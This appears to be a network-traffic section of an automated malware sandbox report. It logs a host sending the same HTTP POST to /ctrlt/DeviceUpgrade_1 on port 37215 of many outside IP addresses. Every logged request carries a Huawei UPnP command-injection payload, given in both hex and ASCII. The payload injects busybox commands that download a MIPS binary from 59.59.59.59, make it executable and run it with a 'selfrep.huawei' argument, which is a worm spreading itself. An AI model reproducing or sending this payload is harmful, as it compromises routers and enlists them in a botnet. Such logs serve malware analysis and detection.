2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1316192.168.2.1533084197.231.71.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.798599958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1317192.168.2.155605241.3.0.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804414988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1318192.168.2.154165841.169.220.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804656029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1319192.168.2.1537688146.253.246.12637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804738998 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1320192.168.2.1534344157.105.99.4537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804744005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1321192.168.2.154750261.237.183.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804807901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1322192.168.2.1557338197.161.216.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804869890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1323192.168.2.155654025.53.204.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.804980993 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1324192.168.2.1555398203.254.197.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805071115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1325192.168.2.1540624157.75.252.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805073977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1326192.168.2.1546750178.7.241.22237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:03.805109024 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
